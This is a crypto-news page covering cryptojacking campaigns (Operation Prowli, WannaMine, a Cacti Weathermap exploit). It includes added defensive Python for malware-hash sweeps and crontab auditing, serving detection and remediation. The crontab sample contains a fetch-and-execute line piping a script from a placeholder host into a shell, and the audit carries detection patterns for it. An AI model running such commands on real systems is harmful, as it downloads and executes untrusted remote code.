coin renders

Use our news to inform cryptocurrency trading decisions, stay up-to-date on happenings in the industry, and more!

Ledger Wallet Desktop Edition Launching on July 9
Block Explorer’s Tony Spilotro reports, “Cold storage through a hardware wallet such as the Ledger Nano S is among the safest, most secure, and most widely recommended ways to store crypto assets. However, using a hardware wallet isn’t always straightforward: not all coins are supported, user interfaces are clunky, and users are often required to use multiple apps to interact with different blockchains.”

Operation Prowli: GuardiCore Uncovers Large Scale Cryptojacking
GuardiCore, a cloud-based security provider, has uncovered a large-scale attack on vulnerable servers. BlockExplorer reported on the story as it came to light: “Codenamed Operation Prowli, the attack leverages various exploits to redirect web traffic, and to install cryptocurrency mining software on its targets.”

One Firm Is Way Ahead of Wall Street on Bitcoin
The New York Times reports, “The financial firm, Susquehanna International Group in Bala Cynwyd, Pa., just outside Philadelphia, is one of the largest players in trading traditional investments like stocks, options and exchange traded funds, or E.T.F.s. Over the last two years, the privately owned company has also built up a trading desk of around a dozen people that buys and sells millions of dollars’ worth of Bitcoin and other virtual or cryptocurrencies in private deals.”

Lobbyists Cash-in On Bitcoin
In this Politico money podcast, reporters examine how lobbyists cash in on bitcoin.

Image courtesy of Carty Sewill, http://cartyisme.com/

GuardiCore, a cloud-based security provider, has uncovered a large-scale attack on vulnerable servers. Codenamed Operation Prowli, the attack leverages various exploits to redirect web traffic, and to install cryptocurrency mining software on its targets.

Operation Prowli

Operation Prowli attacks targets with various exploits tailored to specific vulnerabilities, ranging from SSH brute forcing to Mirai-like attacks on consumer modems. Post-infection actions include installing cryptocurrency miners and redirecting web traffic; both are intended to provide a revenue stream to those running the attack. At the time of writing, over 40,000 computers were reported to have fallen victim.

A more in-depth look at the methodology and attacks used by Operation Prowli can be found in GuardiCore’s release.

Cryptojacking

Cryptojacking, or stealing computing power from others, allows those behind Operation Prowli to use many compromised computers to mine cryptocurrency. As in the last few reports on cryptojacking, the attackers’ currency of choice is Monero, undoubtedly chosen for its commitment to remaining minable on consumer CPUs and for its untraceable nature.

Traffic redirection

Once Operation Prowli has gained access to a server, it attempts to redirect web traffic towards malicious sites. The example given in GuardiCore’s release is tech support scams.

Prevention and staying secure

For consumers, the best way to stay secure is to verify that the site you have visited is the one you intended, and otherwise to follow only links you trust.

For providers that are not already infected, servers can be secured in various ways. The simplest are using strong passwords and exposing to the internet only what you absolutely have to; for this reason, firewalls that close ports which do not need to be reached externally are a must. Beyond that, keeping the software you run up to date and free of longstanding security issues will go a long way.

For providers that are already infected, changing all passwords and performing a security audit is a good first step. After that, stop all running malicious processes and remove their binaries (hashes provided below), or, in the case of the traffic redirection attack, check all relevant files for malicious lines.

Filename    Hash (sourced from GuardiCore’s release)
r2r2 128582a05985d80af0c0370df565aec52627ab70dad3672702ffe9bd872f65d8
r2r2-a 09fa626ac488bca48d94c9774d6ae37d9d1d52256c807b6341f0a08bdd722abf
r2r2-m 908a91a707a3a47f9d4514ecdb9e43de861ffa79c40202f0f72b4866fb6c23a6
r345 51f9b87efd00d3c12e4d73524e9626bfeed0f4948781a6f38a7301b102b8dbbd
r345-a cfb8f536c7019d4d04fb90b7dce8d7eefaa6a862a85c523d869912a1fbaf946a
r345-m 88d03f514b2c36e06fd3b7ed6e53c7525a8e8370c4df036b3b96a6da82c8b45b
xm111 b070d06a3615f3db67ad3beab43d6d21f3c88026aa2b4726a93df47145cd30ec
cl1 7e6cadbfad7147d78fae0716cadb9dcb1de7c4a392d8d72551c5301abe11f2b2
z.exe a0a52dc6cf98ad9c9cb244d810a22aa9f36710f21286b5b9a9162c850212b160
pro-wget a09248f3a4d7e58368a1847f235f0ceb52508f29067ad27a36a590dc13df4b42
pro-s2 3e5b3a11276e39821e166b5dbf6414003c1e2ecae3bdca61ab673f23db74734b
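The hash table above lends itself to an automated sweep. The following is an added example, not code from the original article or from GuardiCore: it walks a directory tree, hashes every regular file and reports any whose digest appears in the table, and on Linux it also hashes the executable behind each running process through /proc/<pid>/exe, which is how a miner whose on-disk binary was deleted after launch still gets found. It assumes the digests are SHA-256 (they are 64 hex characters long, which is SHA-256’s output size). The file it scans in its self-check is constructed and harmless.

```python
"""Hash-based IoC sweep for the Operation Prowli binaries listed above.
Added example, not code from the original article or from GuardiCore; it
assumes the table's digests are SHA-256."""
import hashlib
import os
import sys
import tempfile
from pathlib import Path

# Filename/hash table reproduced from the article (sourced from GuardiCore's release).
PROWLI_IOC_TABLE = """
r2r2 128582a05985d80af0c0370df565aec52627ab70dad3672702ffe9bd872f65d8
r2r2-a 09fa626ac488bca48d94c9774d6ae37d9d1d52256c807b6341f0a08bdd722abf
r2r2-m 908a91a707a3a47f9d4514ecdb9e43de861ffa79c40202f0f72b4866fb6c23a6
r345 51f9b87efd00d3c12e4d73524e9626bfeed0f4948781a6f38a7301b102b8dbbd
r345-a cfb8f536c7019d4d04fb90b7dce8d7eefaa6a862a85c523d869912a1fbaf946a
r345-m 88d03f514b2c36e06fd3b7ed6e53c7525a8e8370c4df036b3b96a6da82c8b45b
xm111 b070d06a3615f3db67ad3beab43d6d21f3c88026aa2b4726a93df47145cd30ec
cl1 7e6cadbfad7147d78fae0716cadb9dcb1de7c4a392d8d72551c5301abe11f2b2
z.exe a0a52dc6cf98ad9c9cb244d810a22aa9f36710f21286b5b9a9162c850212b160
pro-wget a09248f3a4d7e58368a1847f235f0ceb52508f29067ad27a36a590dc13df4b42
pro-s2 3e5b3a11276e39821e166b5dbf6414003c1e2ecae3bdca61ab673f23db74734b
"""


def load_iocs(table):
    """Parse 'name hash' lines into {hash: name}; keys are lowercased so the
    lookup is case-insensitive, and lines without a 64-hex digest are skipped."""
    iocs = {}
    for line in table.strip().splitlines():
        parts = line.split()
        if len(parts) == 2 and len(parts[1]) == 64:
            iocs[parts[1].lower()] = parts[0]
    return iocs


def sha256_file(path, chunk_size=1 << 20):
    """Stream a file through SHA-256 so large binaries need not fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()


def scan_tree(root, iocs):
    """Return [(path, ioc_name, digest)] for every regular file under root whose
    digest is in the IoC set. Symlinks are skipped, unreadable files ignored."""
    hits = []
    for dirpath, _dirs, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            if os.path.islink(path) or not os.path.isfile(path):
                continue
            try:
                digest = sha256_file(path)
            except OSError:
                continue  # permission denied, file vanished mid-scan, etc.
            if digest in iocs:
                hits.append((path, iocs[digest], digest))
    return hits


def scan_processes(iocs):
    """Linux only: hash each running process's executable via /proc/<pid>/exe.
    The kernel keeps an unlinked binary reachable through that link, so a
    miner deleted from disk after launch is still caught. Returns
    [(pid, ioc_name, digest)], or [] where /proc is not available."""
    hits = []
    proc = Path("/proc")
    if not proc.is_dir():
        return hits
    for entry in proc.iterdir():
        if not entry.name.isdigit():
            continue
        try:
            digest = sha256_file(entry / "exe")
        except OSError:
            continue  # kernel threads, processes we may not read, races
        if digest in iocs:
            hits.append((int(entry.name), iocs[digest], digest))
    return hits


def constructed_self_check():
    """Scan a throwaway directory holding one constructed, harmless file: first
    against the Prowli IoCs alone (no hit), then with that file's own digest
    added (one hit), exercising both paths of scan_tree."""
    iocs = load_iocs(PROWLI_IOC_TABLE)
    with tempfile.TemporaryDirectory() as tmp:
        nested = os.path.join(tmp, "opt", "cache")
        os.makedirs(nested)
        sample = os.path.join(nested, "sample.bin")
        with open(sample, "wb") as f:
            f.write(b"constructed sample file, not malware\n")
        digest = sha256_file(sample)
        clean_hits = scan_tree(tmp, iocs)
        seeded_hits = scan_tree(tmp, {**iocs, digest: "constructed-sample"})
    return clean_hits, [name for _path, name, _digest in seeded_hits]


if __name__ == "__main__":
    if len(sys.argv) != 2:
        sys.exit("usage: <script> <directory to scan>")
    iocs = load_iocs(PROWLI_IOC_TABLE)
    for path, name, digest in scan_tree(sys.argv[1], iocs):
        print(f"FILE  {path}  matches {name} ({digest})")
    for pid, name, digest in scan_processes(iocs):
        print(f"PROC  pid {pid}  matches {name} ({digest})")
```

A clean sweep is one signal, not a clean bill of health: a recompiled or repacked miner has a different hash, so the password reset and security audit the article recommends still have to happen, and the process check should be run before the binaries are removed so that a deleted-but-running miner is not missed.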


Twitter CEO Jack Dorsey: Bitcoin Should Be Native Currency of the Internet
Twitter and Square CEO Jack Dorsey stood on stage at the Consensus conference, saying Bitcoin should be the cryptocurrency of the internet.

Adware Bundle Makes Chrome Invisible to Launch Cryptojacking Attacks
ZDNet reports, “CPU usage spikes up to 80 percent on infected machines.”

The SEC Launches Phony ICO Site to Promote Scam Awareness
In a bid to raise awareness of potential investment scams in the cryptocurrency space, BlockExplorer’s Tony Spilotro says, the U.S. Securities and Exchange Commission’s (SEC) Office of Investor Education and Advocacy has launched a fake website posing as a luxury travel firm kicking off the pre-sale portion of its initial coin offering (ICO).

Largest Bank in the Philippines Showcases Bitcoin Mining Equipment
The cryptocurrency world is buzzing at the news that the Philippines’ largest bank is dabbling in Bitcoin. NewsBTC reports, “UnionBank recently demonstrated its cryptocurrency miners at a business conference. That is an interesting development, considering how the world’s leading cryptocurrency is a legal tender in the country.”

PwC China Survey Finds That Most Companies Prefer to Investigate Blockchain Internally
Rebecca Campbell of BlockExplorer reports, “A joint survey by PwC and VeChain has found that most enterprises prefer to set up their own in-house research and development (R&D) teams to investigate the blockchain.”

Image courtesy of Carty Sewill, http://cartyisme.com/

Following the use of the NSA-developed EternalBlue exploit in the now-infamous WannaCry ransomware, a new malware known as WannaMine has surfaced.

WannaMine follows in WannaCry’s footsteps, using the NSA-developed EternalBlue exploit to propagate. After infection, the similarities end: where WannaCry encrypts all available files and notifies the user of its presence, WannaMine silently installs and runs mining software for the cryptocurrency Monero.

Use of Monero

This is the latest in a line of cryptojacking attacks whose mining software specifically mines Monero. The perpetrators’ reasons for choosing Monero are unknown, though the choice may have to do with Monero’s minability on mid- to low-end computers and the privacy built into Monero’s blockchain.

Detection

After infection and initial setup, WannaMine uses Windows management tools for persistence. Once a machine is infected, the malicious settings can be difficult to find among the large number of legitimate ones.

One of the simplest methods of detection is to monitor your computer’s CPU usage, since abnormally high CPU usage can be caused by cryptojacking. You can view CPU usage in Windows Task Manager. High CPU usage also makes a computer run hotter, which may make its fans louder.

Prevention

WannaMine uses EternalBlue to propagate, and Microsoft patched that vulnerability in 2017, so as long as all computers on your network are up to date you should be secure from WannaMine. Otherwise, standard security advice, such as not following unknown links, applies.


Cryptojacking, in which attackers exploit code vulnerabilities to install malicious code on computers that are then used to mine cryptocurrency, has become a widespread phenomenon affecting everyday consumers and major businesses alike. A new report from cyber-security firm Trend Micro describes a cryptojacking campaign that is among the largest documented yet, with just under $75,000 in Monero mined on people’s computers across the globe.

A vulnerability discovered in the Network Weathermap plugin for Cacti, which is, ironically, an open-source network monitoring tool, was used to infect Linux servers with malware that lets the attackers use the servers’ resources to mine Monero. Monero is often used in cryptojacking schemes because it is easy to mine and its privacy-centric design helps keep the hijackers anonymous.

This specific cryptojacking campaign is using malicious code dubbed “watchd0g.sh” and is focusing on x86-64 Linux servers in the United States, Japan, Taiwan, China, India, and much of the rest of the world.

The vulnerability, CVE-2013-2618, has had a patch available for nearly five years; it allows the attackers to execute code on the servers hosting the plugin and install a customized version of XMRig. The attackers modified XMRig’s open-source code to avoid detection by limiting the amount of CPU it uses, so as not to raise any red flags and to keep flying under the radar. The code runs every time the computer is started, runs every three minutes, and is designed to automatically re-download itself if deleted.
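The article says the miner runs at boot, runs every three minutes and re-downloads itself when deleted. On a Linux server that kind of persistence is most often carried by cron entries, and that is the assumption behind this added example; it is not Trend Micro’s code and not from the original article, and the crontab it checks is constructed, with a placeholder host name rather than any real indicator. It flags jobs that download and pipe a remote script into a shell, or that execute from a world-writable or hidden directory, and records how often each flagged job fires and whether it re-arms itself at boot.

```python
"""Crontab audit for the persistence pattern described above.
Added example, not Trend Micro's code and not from the original article. It
assumes the boot-time and every-three-minutes behaviour is implemented with
cron entries."""
import re
import sys

# Constructed sample crontab: two routine jobs plus two entries shaped like the
# behaviour the article describes. The host name is a placeholder, not an IoC.
CONSTRUCTED_CRONTAB = """\
# m h dom mon dow command
MAILTO=root
0 3 * * * /usr/bin/certbot renew --quiet
*/5 * * * * /usr/local/bin/collect-metrics --push
*/3 * * * * curl -fsSL http://download-host.invalid/watchd0g.sh | sh
@reboot /var/tmp/.cache/watchd0g.sh
"""

# "curl ... | sh" / "wget ... | bash": fetch-and-execute in one line.
DOWNLOAD_AND_EXEC = re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b")
# Locations any local user can write to; legitimate cron jobs rarely live here.
WRITABLE_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
# A dot-directory somewhere in a path, e.g. /var/tmp/.cache/...
HIDDEN_PATH = re.compile(r"/\.[^/\s]+")


def split_entry(line):
    """Return (schedule, command) for a job line; None for blanks, comments
    and VAR=value environment lines."""
    line = line.strip()
    if not line or line.startswith("#") or re.match(r"^\w+=", line):
        return None
    if line.startswith("@"):                 # @reboot, @daily, ...
        parts = line.split(None, 1)
        return tuple(parts) if len(parts) == 2 else None
    parts = line.split(None, 5)              # five time fields, then command
    if len(parts) < 6:
        return None
    return " ".join(parts[:5]), parts[5]


def run_interval_minutes(schedule):
    """Minutes between runs for the simple minute fields '*' and '*/N';
    None for @-schedules and anything more complex."""
    if schedule.startswith("@"):
        return None
    minute = schedule.split()[0]
    if minute == "*":
        return 1
    m = re.fullmatch(r"\*/(\d+)", minute)
    return int(m.group(1)) if m else None


def audit_crontab(text, frequent_minutes=5):
    """Return one finding per suspicious job: {'schedule', 'command', 'reasons'}.
    A job is reported only on a content indicator (fetch-and-execute, writable
    or hidden path); its cadence and @reboot status are added as context."""
    findings = []
    for line in text.splitlines():
        entry = split_entry(line)
        if entry is None:
            continue
        schedule, command = entry
        reasons = []
        if DOWNLOAD_AND_EXEC.search(command):
            reasons.append("downloads a remote script and pipes it into a shell")
        if any(d in command for d in WRITABLE_DIRS):
            reasons.append("executes from a world-writable directory")
        if HIDDEN_PATH.search(command):
            reasons.append("uses a hidden path component")
        if not reasons:
            continue
        interval = run_interval_minutes(schedule)
        if interval is not None and interval <= frequent_minutes:
            reasons.append(f"fires every {interval} minute(s)")
        if schedule == "@reboot":
            reasons.append("re-establishes itself at boot")
        findings.append({"schedule": schedule, "command": command, "reasons": reasons})
    return findings


if __name__ == "__main__":
    # Audit a crontab file given on the command line, else the constructed sample.
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else CONSTRUCTED_CRONTAB
    for f in audit_crontab(text):
        print(f"{f['schedule']}  {f['command']}")
        for r in f["reasons"]:
            print(f"    - {r}")
```

Run it over the output of `crontab -l` for each account as well as the system crontab and cron.d files, since a job that re-downloads its own script every few minutes will survive deleting the script alone; the cron entry and the process have to go together, which is why the article pairs patching with keeping Cacti data internal rather than relying on cleanup.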

Trend Micro was able to tie the malicious mining software to two Monero wallets, totaling just under $75,000 in the privacy-focused cryptocurrency. The firm also believes that this campaign is connected to another cryptojacking campaign on Windows computers that resulted in over $3 million in XMR being mined.

Trend Micro explains that users must keep their machines up to date with all patches, and that “data from Cacti should be properly kept internal to the environment.” Because the vulnerability is so old, many users will unknowingly remain affected. For more technical details on the vulnerability, Trend Micro has a full breakdown on its blog.